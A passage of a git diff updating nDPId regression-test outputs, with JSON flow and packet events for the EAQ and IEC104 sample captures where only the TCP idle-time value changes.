-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948562,"flow_last_seen":1432820948562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948562,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"} +00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"} +00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820949586,"flow_last_seen":1432820949586,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820949586,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820949586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949586,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNX0AAAAAAAADdoAAUsHAACQAA=="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820949685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949685,"pkt":"ABoRAAACABoRAAABCABFAAAsAAxAABARDWHIuYqSCggAARdwzCEAGAX1AAAAAAAADdoAAUsHAABgAA=="} @@ -162,7 +162,7 @@ 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} @@ -172,7 +172,7 @@ 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} diff --git a/test/results/IEC104.pcap.out b/test/results/IEC104.pcap.out index a634d767a..eac1274c4 100644 --- a/test/results/IEC104.pcap.out +++ b/test/results/IEC104.pcap.out @@ -1,17 +1,17 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"IEC104.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1317629088495} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088495,"flow_last_seen":1317629088495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088495,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317629088495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088495,"pkt":"eCvLK7lWABIAxkrACABFAAAoUqRAAH0GWeoKr9MBCndpGglk1fBIoLt3AFkTVVAQ\/elpjgAAAAAAAAAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 